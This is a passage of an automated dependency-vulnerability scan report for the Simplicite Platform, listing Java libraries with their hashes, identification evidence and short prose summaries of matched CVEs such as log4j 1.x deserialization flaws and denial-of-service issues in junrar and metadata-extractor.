Evidence Type Source Name Value Confidence Vendor file name jul-to-slf4j High Vendor jar package name bridge Highest Vendor jar package name slf4j Highest Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname jul.to.slf4j Medium Vendor pom artifactid jul-to-slf4j Highest Vendor pom artifactid jul-to-slf4j Low Vendor pom groupid org.slf4j Highest Vendor pom name JUL to SLF4J bridge High Vendor pom parent-artifactid slf4j-parent Low Vendor pom url http://www.slf4j.org Highest Product file name jul-to-slf4j High Product jar package name bridge Highest Product jar package name slf4j Highest Product Manifest Bundle-Name jul-to-slf4j Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname jul.to.slf4j Medium Product pom artifactid jul-to-slf4j Highest Product pom groupid org.slf4j Highest Product pom name JUL to SLF4J bridge High Product pom parent-artifactid slf4j-parent Medium Product pom url http://www.slf4j.org Medium Version file version 1.7.30 High Version Manifest Bundle-Version 1.7.30 High Version Manifest Implementation-Version 1.7.30 High Version pom version 1.7.30 Highest
junit-4.13.2.jarDescription:
JUnit is a unit testing framework for Java, created by Erich Gamma and Kent Beck. License:
Eclipse Public License 1.0: http://www.eclipse.org/legal/epl-v10.html File Path: /var/simplicite/.m2/repository/junit/junit/4.13.2/junit-4.13.2.jar
MD5: d98a9a02a99a9acd22d7653cbcc1f31f
SHA1: 8ac9e16d933b6fb43bc7f576336b8f4d7eb5ba12
SHA256: 8e495b634469d64fb8acfa3495a065cbacc8a0fff55ce1e31007be4c16dc57d3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name junit High Vendor jar package name framework Highest Vendor jar package name junit Highest Vendor Manifest automatic-module-name junit Medium Vendor Manifest implementation-url http://junit.org Low Vendor Manifest Implementation-Vendor JUnit High Vendor Manifest Implementation-Vendor-Id junit Medium Vendor pom artifactid junit Highest Vendor pom artifactid junit Low Vendor pom developer email david@saff.net Low Vendor pom developer email kcooney@google.com Low Vendor pom developer email mail@marcphilipp.de Low Vendor pom developer email mail@stefan-birkner.de Low Vendor pom developer id dsaff Medium Vendor pom developer id kcooney Medium Vendor pom developer id marcphilipp Medium Vendor pom developer id stefanbirkner Medium Vendor pom developer name David Saff Medium Vendor pom developer name Kevin Cooney Medium Vendor pom developer name Marc Philipp Medium Vendor pom developer name Stefan Birkner Medium Vendor pom groupid junit Highest Vendor pom name JUnit High Vendor pom organization name JUnit High Vendor pom organization url http://www.junit.org Medium Vendor pom url http://junit.org Highest Product file name junit High Product jar package name framework Highest Product jar package name junit Highest Product Manifest automatic-module-name junit Medium Product Manifest Implementation-Title JUnit High Product Manifest implementation-url http://junit.org Low Product pom artifactid junit Highest Product pom developer email david@saff.net Low Product pom developer email kcooney@google.com Low Product pom developer email mail@marcphilipp.de Low Product pom developer email mail@stefan-birkner.de Low Product pom developer id dsaff Low Product pom developer id kcooney Low Product pom developer id marcphilipp Low Product pom developer id stefanbirkner Low Product pom developer name David Saff Low Product pom developer name Kevin Cooney Low Product pom developer name Marc Philipp Low Product pom developer name Stefan Birkner Low Product pom groupid junit Highest Product pom name JUnit High Product pom organization name JUnit Low Product pom organization url http://www.junit.org Low Product pom url http://junit.org Medium Version file version 4.13.2 High Version Manifest Implementation-Version 4.13.2 High Version pom version 4.13.2 Highest
juniversalchardet-1.0.3.jarDescription:
Java port of universalchardet License:
Mozilla Public License 1.1 (MPL 1.1): http://www.mozilla.org/MPL/MPL-1.1.html File Path: /var/simplicite/.m2/repository/com/googlecode/juniversalchardet/juniversalchardet/1.0.3/juniversalchardet-1.0.3.jar
MD5: d9ea0a9a275336c175b343f2e4cd8f27
SHA1: cd49678784c46aa8789c060538e0154013bb421b
SHA256: 757bfe906193b8b651e79dc26cd67d6b55d0770a2cdfb0381591504f779d4a76
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name juniversalchardet High Vendor jar package name mozilla Low Vendor jar package name prober Low Vendor jar package name universalchardet Highest Vendor jar package name universalchardet Low Vendor pom artifactid juniversalchardet Highest Vendor pom artifactid juniversalchardet Low Vendor pom developer email takscape@gmail.com Low Vendor pom developer id takscape Medium Vendor pom groupid com.googlecode.juniversalchardet Highest Vendor pom name juniversalchardet High Vendor pom url http://juniversalchardet.googlecode.com/ Highest Product file name juniversalchardet High Product jar package name prober Low Product jar package name universalchardet Highest Product jar package name universalchardet Low Product pom artifactid juniversalchardet Highest Product pom developer email takscape@gmail.com Low Product pom developer id takscape Low Product pom groupid com.googlecode.juniversalchardet Highest Product pom name juniversalchardet High Product pom url http://juniversalchardet.googlecode.com/ Medium Version file version 1.0.3 High Version pom version 1.0.3 Highest
junrar-4.0.0.jarDescription:
rar decompression library in plain java License:
UnRar License: https://raw.github.com/junrar/junrar/master/license.txt File Path: /var/simplicite/.m2/repository/com/github/junrar/junrar/4.0.0/junrar-4.0.0.jar
MD5: 38103347e0c3e06ee52ce032cee9e902
SHA1: 93f9b74e1507db9c55c5bdd35369376a474e4db5
SHA256: 2eafa4571dfebe4e42e686657f9e597aaa86bb68942b590d5af9902e7caddb20
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name junrar High Vendor jar package name github Highest Vendor jar package name junrar Highest Vendor Manifest mode development Low Vendor Manifest url https://github.com/junrar/junrar Low Vendor pom artifactid junrar Highest Vendor pom artifactid junrar Low Vendor pom developer id edmund_wagner Medium Vendor pom developer name Edmund Wagner Medium Vendor pom groupid com.github.junrar Highest Vendor pom name Java UnRar High Vendor pom url junrar/junrar Highest Product file name junrar High Product jar package name github Highest Product jar package name junrar Highest Product Manifest mode development Low Product Manifest url https://github.com/junrar/junrar Low Product pom artifactid junrar Highest Product pom developer id edmund_wagner Low Product pom developer name Edmund Wagner Low Product pom groupid com.github.junrar Highest Product pom name Java UnRar High Product pom url junrar/junrar High Version file version 4.0.0 High Version pom version 4.0.0 Highest
CVE-2022-23596 suppress
Junrar is an open source java RAR archive library. In affected versions A carefully crafted RAR archive can trigger an infinite loop while extracting said archive. The impact depends solely on how the application uses the library, and whether files can be provided by malignant users. The problem is patched in 7.4.1. There are no known workarounds and users are advised to upgrade as soon as possible. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
jzlib-1.1.1.jarDescription:
JZlib is a re-implementation of zlib in pure Java License:
Revised BSD: http://www.jcraft.com/jzlib/LICENSE.txt File Path: /var/simplicite/.m2/repository/com/jcraft/jzlib/1.1.1/jzlib-1.1.1.jar
MD5: 553b605c56ec6f508ab46ed026e21622
SHA1: a1551373315ffc2f96130a0e5704f74e151777ba
SHA256: 5cb1e9f9cf0be011487545694ff0a178237c6bfcbb21c97865cdc52c60b9347a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jzlib High Vendor jar package name jcraft Highest Vendor jar package name jcraft Low Vendor jar package name jzlib Highest Vendor jar package name jzlib Low Vendor pom artifactid jzlib Highest Vendor pom artifactid jzlib Low Vendor pom developer email ymnk at jcraft D0t com Low Vendor pom developer id ymnk Medium Vendor pom developer name Atsuhiko Yamanaka Medium Vendor pom developer org JCraft,Inc. Medium Vendor pom developer org URL http://www.jcraft.com/ Medium Vendor pom groupid com.jcraft Highest Vendor pom name JZlib High Vendor pom organization name JCraft,Inc. High Vendor pom organization url http://www.jcraft.com/ Medium Vendor pom url http://www.jcraft.com/jzlib/ Highest Product file name jzlib High Product jar package name jcraft Highest Product jar package name jzlib Highest Product jar package name jzlib Low Product pom artifactid jzlib Highest Product pom developer email ymnk at jcraft D0t com Low Product pom developer id ymnk Low Product pom developer name Atsuhiko Yamanaka Low Product pom developer org JCraft,Inc. Low Product pom developer org URL http://www.jcraft.com/ Low Product pom groupid com.jcraft Highest Product pom name JZlib High Product pom organization name JCraft,Inc. Low Product pom organization url http://www.jcraft.com/ Low Product pom url http://www.jcraft.com/jzlib/ Medium Version file version 1.1.1 High Version pom version 1.1.1 Highest
libphonenumber-8.12.6.jarDescription:
Google's common Java library for parsing, formatting, storing and validating international phone numbers. Optimized for running on smartphones. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/googlecode/libphonenumber/libphonenumber/8.12.6/libphonenumber-8.12.6.jar
MD5: 61e2edb830516cca446822a3f2ccf77e
SHA1: ade471e53eb8c848f91dba4fdb2f462f8319220e
SHA256: c118abe8954172149c98e727c8630eda4954e048582a9e5007e3479681453e94
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name libphonenumber High Vendor Manifest bundle-docurl http://www.google.com/ Low Vendor Manifest bundle-symbolicname com.googlecode.libphonenumber Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid libphonenumber Highest Vendor pom artifactid libphonenumber Low Vendor pom groupid com.googlecode.libphonenumber Highest Vendor pom parent-artifactid libphonenumber-parent Low Vendor pom url google/libphonenumber/ Highest Product file name libphonenumber High Product jar package name google Highest Product Manifest bundle-docurl http://www.google.com/ Low Product Manifest Bundle-Name libphonenumber Medium Product Manifest bundle-symbolicname com.googlecode.libphonenumber Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid libphonenumber Highest Product pom groupid com.googlecode.libphonenumber Highest Product pom parent-artifactid libphonenumber-parent Medium Product pom url google/libphonenumber/ High Version file version 8.12.6 High Version Manifest Bundle-Version 8.12.6 High Version pom version 8.12.6 Highest
listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jarDescription:
An empty artifact that Guava depends on to signal that it is providing
ListenableFuture -- but is also available in a second "version" that
contains com.google.common.util.concurrent.ListenableFuture class, without
any other Guava classes. The idea is:
- If users want only ListenableFuture, they depend on listenablefuture-1.0.
- If users want all of Guava, they depend on guava, which, as of Guava
27.0, depends on
listenablefuture-9999.0-empty-to-avoid-conflict-with-guava. The 9999.0-...
version number is enough for some build systems (notably, Gradle) to select
that empty artifact over the "real" listenablefuture-1.0 -- avoiding a
conflict with the copy of ListenableFuture in guava itself. If users are
using an older version of Guava or a build system other than Gradle, they
may see class conflicts. If so, they can solve them by manually excluding
the listenablefuture artifact or manually forcing their build systems to
use 9999.0-....
File Path: /var/simplicite/.m2/repository/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jarMD5: d094c22570d65e132c19cea5d352e381SHA1: b421526c5f297295adef1c886e5246c39d4ac629SHA256: b372a037d4230aa57fbeffdef30fd6123f9c0c2db85d0aced00c91b974f33f99Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name listenablefuture High Vendor pom artifactid listenablefuture Highest Vendor pom artifactid listenablefuture Low Vendor pom groupid com.google.guava Highest Vendor pom name Guava ListenableFuture only High Vendor pom parent-artifactid guava-parent Low Product file name listenablefuture High Product pom artifactid listenablefuture Highest Product pom groupid com.google.guava Highest Product pom name Guava ListenableFuture only High Product pom parent-artifactid guava-parent Medium Version pom parent-version 9999.0-empty-to-avoid-conflict-with-guava Low Version pom version 9999.0-empty-to-avoid-conflict-with-guava Highest
log4j-1.2.17.jarDescription:
Apache Log4j 1.2 License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/log4j/log4j/1.2.17/log4j-1.2.17.jar
MD5: 04a41f0a068986f0f73485cf507c0f40
SHA1: 5af35056b4d257e4b64b9e8069c0746e8b08629f
SHA256: 1d31696445697720527091754369082a6651bd49781b6005deb94e56753406f9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name log4j High Vendor jar package name apache Highest Vendor jar package name log4j Highest Vendor Manifest bundle-docurl http://logging.apache.org/log4j/1.2 Low Vendor Manifest bundle-symbolicname log4j Medium Vendor manifest: org.apache.log4j Implementation-Vendor "Apache Software Foundation" Medium Vendor pom artifactid log4j Highest Vendor pom artifactid log4j Low Vendor pom groupid log4j Highest Vendor pom name Apache Log4j High Vendor pom organization name Apache Software Foundation High Vendor pom organization url http://www.apache.org Medium Vendor pom url http://logging.apache.org/log4j/1.2/ Highest Product file name log4j High Product jar package name apache Highest Product jar package name log4j Highest Product Manifest bundle-docurl http://logging.apache.org/log4j/1.2 Low Product Manifest Bundle-Name Apache Log4j Medium Product Manifest bundle-symbolicname log4j Medium Product manifest: org.apache.log4j Implementation-Title log4j Medium Product pom artifactid log4j Highest Product pom groupid log4j Highest Product pom name Apache Log4j High Product pom organization name Apache Software Foundation Low Product pom organization url http://www.apache.org Low Product pom url http://logging.apache.org/log4j/1.2/ Medium Version file version 1.2.17 High Version Manifest Bundle-Version 1.2.17 High Version manifest: org.apache.log4j Implementation-Version 1.2.17 Medium Version pom version 1.2.17 Highest
CVE-2019-17571 suppress
Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17. CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2020-9493 suppress
A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution. CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-23305 suppress
By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-23302 suppress
JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: MEDIUM (6.0) Vector: /AV:N/AC:M/Au:S/C:P/I:P/A:P CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-23307 suppress
CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists. CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: HIGH (9.0) Vector: /AV:N/AC:L/Au:S/C:C/I:C/A:C CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-4104 (OSSINDEX) suppress
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2021-4104 for details CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:H/Au:/C:H/I:H/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:log4j:log4j:1.2.17:*:*:*:*:*:*:* CVE-2023-26464 suppress
** UNSUPPORTED WHEN ASSIGNED **
When using the Chainsaw or SocketAppender components with Log4j 1.x on JRE less than 1.7, an attacker that manages to cause a logging entry involving a specially-crafted (ie, deeply nested)
hashmap or hashtable (depending on which logging component is in use) to be processed could exhaust the available memory in the virtual machine and achieve Denial of Service when the object is deserialized.
This issue affects Apache Log4j before 2. Affected users are recommended to update to Log4j 2.x.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
lucene-core-8.2.0.jarDescription:
Apache Lucene Java Core File Path: /var/simplicite/.m2/repository/org/apache/lucene/lucene-core/8.2.0/lucene-core-8.2.0.jarMD5: 38017372e81035c484ad5cf94d88d8eaSHA1: f6da40436d3633de272810fae1e339c237adfcf6SHA256: 25564b27cebe18a5f0e988b5aeee342e1dd163b2dfca888eb1cea4dcadb32dd2Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name lucene-core High Vendor jar package name apache Highest Vendor jar package name lucene Highest Vendor jar package name org Highest Vendor Manifest extension-name org.apache.lucene Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest multi-release true Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid lucene-core Highest Vendor pom artifactid lucene-core Low Vendor pom groupid org.apache.lucene Highest Vendor pom name Lucene Core High Vendor pom parent-artifactid lucene-parent Low Product file name lucene-core High Product jar package name apache Highest Product jar package name lucene Highest Product jar package name org Highest Product jar package name search Highest Product Manifest extension-name org.apache.lucene Medium Product Manifest Implementation-Title org.apache.lucene High Product Manifest multi-release true Low Product Manifest specification-title Lucene Search Engine: core Medium Product pom artifactid lucene-core Highest Product pom groupid org.apache.lucene Highest Product pom name Lucene Core High Product pom parent-artifactid lucene-parent Medium Version file version 8.2.0 High Version pom version 8.2.0 Highest
mbassador-1.3.2.jarDescription:
Mbassador is a fast and flexible event bus system following the publish subscribe pattern.
It is designed for ease of use and aims to be feature rich and extensible while preserving resource efficiency
and performance.
It provides non-blocking iterators and minimal write contention with low memory footprint.
Some features:
declarative handler definition via annotations,
sync and/or async event delivery,
weak or strong references,
configurable event filters,
License:
MIT license: http://www.opensource.org/licenses/mit-license.php File Path: /var/simplicite/.m2/repository/net/engio/mbassador/1.3.2/mbassador-1.3.2.jar
MD5: 6844d9220e623fa491776e38a61f29a2
SHA1: 4ebb2c5f853bf8a5f87147b186a9758d2e2ec0af
SHA256: 469e2e9c68271eadaff12483bbb1abc640ea9973af7fa0519250e04f503aca67
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name mbassador High Vendor jar package name bus Highest Vendor jar package name engio Highest Vendor jar package name net Highest Vendor Manifest bundle-symbolicname net.engio.mbassador Medium Vendor pom artifactid mbassador Highest Vendor pom artifactid mbassador Low Vendor pom developer email b.diedrichsen@googlemail.com Low Vendor pom developer id bennidi Medium Vendor pom developer name Benjamin Diedrichsen Medium Vendor pom groupid net.engio Highest Vendor pom name mbassador High Vendor pom url bennidi/mbassador Highest Product file name mbassador High Product jar package name bus Highest Product jar package name engio Highest Product jar package name net Highest Product Manifest Bundle-Name mbassador Medium Product Manifest bundle-symbolicname net.engio.mbassador Medium Product pom artifactid mbassador Highest Product pom developer email b.diedrichsen@googlemail.com Low Product pom developer id bennidi Low Product pom developer name Benjamin Diedrichsen Low Product pom groupid net.engio Highest Product pom name mbassador High Product pom url bennidi/mbassador High Version file version 1.3.2 High Version Manifest Bundle-Version 1.3.2 High Version pom version 1.3.2 Highest
mchange-commons-java-0.2.15.jarDescription:
mchange-commons-java License:
GNU Lesser General Public License, Version 2.1: http://www.gnu.org/licenses/lgpl-2.1.html
Eclipse Public License, Version 1.0: http://www.eclipse.org/org/documents/epl-v10.html File Path: /var/simplicite/.m2/repository/com/mchange/mchange-commons-java/0.2.15/mchange-commons-java-0.2.15.jar
MD5: 97c4575d9d49d9afb71492e6bb4417da
SHA1: 6ef5abe5f1b94ac45b7b5bad42d871da4fda6bbc
SHA256: 2b8fce65e95a3e968d5ab3507e2833f43df3daee0635ee51c7ce33343bb3a21c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name mchange-commons-java High Vendor jar package name mchange Highest Vendor Manifest Implementation-Vendor com.mchange High Vendor Manifest Implementation-Vendor-Id com.mchange Medium Vendor Manifest specification-vendor com.mchange Low Vendor pom artifactid mchange-commons-java Highest Vendor pom artifactid mchange-commons-java Low Vendor pom developer email swaldman@mchange.com Low Vendor pom developer id swaldman Medium Vendor pom developer name Steve Waldman Medium Vendor pom groupid com.mchange Highest Vendor pom name mchange-commons-java High Vendor pom organization name com.mchange High Vendor pom url swaldman/mchange-commons-java Highest Product file name mchange-commons-java High Product jar package name mchange Highest Product Manifest Implementation-Title mchange-commons-java High Product Manifest specification-title mchange-commons-java Medium Product pom artifactid mchange-commons-java Highest Product pom developer email swaldman@mchange.com Low Product pom developer id swaldman Low Product pom developer name Steve Waldman Low Product pom groupid com.mchange Highest Product pom name mchange-commons-java High Product pom organization name com.mchange Low Product pom url swaldman/mchange-commons-java High Version file version 0.2.15 High Version Manifest Implementation-Version 0.2.15 High Version pom version 0.2.15 Highest
metadata-extractor-2.11.0.jarDescription:
Java library for extracting EXIF, IPTC, XMP, ICC and other metadata from image files. License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/drewnoakes/metadata-extractor/2.11.0/metadata-extractor-2.11.0.jar
MD5: e95f394e786c0c7f22e61bff2e54ff8d
SHA1: 5f11883f6d06a16ca5fb8a9edf7c6c1237a92da0
SHA256: f5ec56c6b01afbfd7019e2da73bdec5d22c60d620c0e8043e6a85adb554d0df7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name metadata-extractor High Vendor jar package name drew Highest Vendor jar package name exif Highest Vendor jar package name icc Highest Vendor jar package name iptc Highest Vendor jar package name metadata Highest Vendor jar package name xmp Highest Vendor Manifest implementation-url https://drewnoakes.com/code/exif/ Low Vendor Manifest Implementation-Vendor Drew Noakes High Vendor Manifest Implementation-Vendor-Id com.drewnoakes Medium Vendor pom artifactid metadata-extractor Highest Vendor pom artifactid metadata-extractor Low Vendor pom developer id drewnoakes Medium Vendor pom developer name Drew Noakes Medium Vendor pom groupid com.drewnoakes Highest Vendor pom url https://drewnoakes.com/code/exif/ Highest Product file name metadata-extractor High Product jar package name exif Highest Product jar package name icc Highest Product jar package name iptc Highest Product jar package name metadata Highest Product jar package name xmp Highest Product Manifest Implementation-Title metadata-extractor High Product Manifest implementation-url https://drewnoakes.com/code/exif/ Low Product pom artifactid metadata-extractor Highest Product pom developer id drewnoakes Low Product pom developer name Drew Noakes Low Product pom groupid com.drewnoakes Highest Product pom url https://drewnoakes.com/code/exif/ Medium Version file version 2.11.0 High Version Manifest Implementation-Version 2.11.0 High Version pom version 2.11.0 Highest
CVE-2019-14262 (OSSINDEX) suppress
MetadataExtractor 2.1.0 allows stack consumption. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.drewnoakes:metadata-extractor:2.11.0:*:*:*:*:*:*:* CVE-2022-24613 suppress
metadata-extractor up to 2.16.0 can throw various uncaught exceptions while parsing a specially crafted JPEG file, which could result in an application crash. This could be used to mount a denial of service attack against services that use metadata-extractor library. CWE-755 Improper Handling of Exceptional Conditions
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-24614 suppress
When reading a specially crafted JPEG file, metadata-extractor up to 2.16.0 can be made to allocate large amounts of memory that finally leads to an out-of-memory error even for very small inputs. This could be used to mount a denial of service attack against services that use metadata-extractor library. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
migbase64-2.2.jarDescription:
MiGBase64 is a very fast and small Base64 Codec written in Java License:
Prior BSD License: http://en.wikipedia.org/wiki/BSD_licenses File Path: /var/simplicite/.m2/repository/com/brsanthu/migbase64/2.2/migbase64-2.2.jar
MD5: da3ef3a9a9fa358ed789b37a3c780727
SHA1: bcc14967d516e93c527897a6c531ba76b5751faa
SHA256: 07224584b6227efbb815e96e3153945786e2a6b1a934620b6130331c2351c129
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name migbase64 High Vendor jar package name base64 Highest Vendor jar package name migbase64 Highest Vendor Manifest bundle-docurl http://sourceforge.net/projects/migbase64/ Low Vendor Manifest bundle-symbolicname com.brsanthu.migbase64 Medium Vendor Manifest Implementation-Vendor Mikael Grev High Vendor Manifest Implementation-Vendor-Id com.brsanthu Medium Vendor Manifest specification-vendor Mikael Grev Low Vendor pom artifactid migbase64 Highest Vendor pom artifactid migbase64 Low Vendor pom developer email http://sourceforge.net/u/mgrev/profile/ Low Vendor pom developer name Mikael Grev Medium Vendor pom developer org URL http://sourceforge.net/u/mgrev/profile/ Medium Vendor pom groupid com.brsanthu Highest Vendor pom name MiG Base64 High Vendor pom organization name Mikael Grev High Vendor pom organization url http://sourceforge.net/projects/migbase64/ Medium Vendor pom url http://sourceforge.net/projects/migbase64/ Highest Product file name migbase64 High Product jar package name base64 Highest Product jar package name migbase64 Highest Product Manifest bundle-docurl http://sourceforge.net/projects/migbase64/ Low Product Manifest Bundle-Name MiG Base64 Medium Product Manifest bundle-symbolicname com.brsanthu.migbase64 Medium Product Manifest Implementation-Title MiG Base64 High Product Manifest specification-title MiG Base64 Medium Product pom artifactid migbase64 Highest Product pom developer email http://sourceforge.net/u/mgrev/profile/ Low Product pom developer name Mikael Grev Low Product pom developer org URL http://sourceforge.net/u/mgrev/profile/ Low Product pom groupid com.brsanthu Highest Product pom name MiG Base64 High Product pom organization name Mikael Grev Low Product pom organization url http://sourceforge.net/projects/migbase64/ Low Product pom url http://sourceforge.net/projects/migbase64/ Medium Version file version 2.2 High Version Manifest Implementation-Version 2.2 High Version pom version 2.2 Highest
mimepull-1.9.3.jarDescription:
Provides a streaming API to access attachments parts in a MIME message.
License:
CDDL 1.1: https://glassfish.java.net/public/CDDL+GPL_1_1.html
GPL2 w/ CPE: https://glassfish.java.net/public/CDDL+GPL_1_1.html File Path: /var/simplicite/.m2/repository/org/jvnet/mimepull/mimepull/1.9.3/mimepull-1.9.3.jar
MD5: a3ee04c11e1c613128f07d5f819196ca
SHA1: c55096ff89a27e22c2e081371d0570ac19cc6788
SHA256: 072eb5692f180ed0685705fb31c900eca0986b4523c23eefc0779e87d79eea35
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name mimepull High Vendor jar package name jvnet Highest Vendor jar package name mimepull Highest Vendor Manifest bundle-docurl http://www.oracle.com/ Low Vendor Manifest bundle-symbolicname org.jvnet.mimepull Medium Vendor Manifest implementation-build-id tags/mimepull-1.9.3-198, 2013-04-19T09:41:12+0000 Low Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id org.jvnet.mimepull Medium Vendor pom artifactid mimepull Highest Vendor pom artifactid mimepull Low Vendor pom developer email jitendra.kotamraju@oracle.com Low Vendor pom developer email martin.grebac@oracle.com Low Vendor pom developer name Jitendra Kotamraju Medium Vendor pom developer name Martin Grebac Medium Vendor pom developer org Oracle Corporation Medium Vendor pom groupid org.jvnet.mimepull Highest Vendor pom name MIME streaming extension High Vendor pom organization name Oracle Corporation High Vendor pom organization url http://www.oracle.com/ Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url 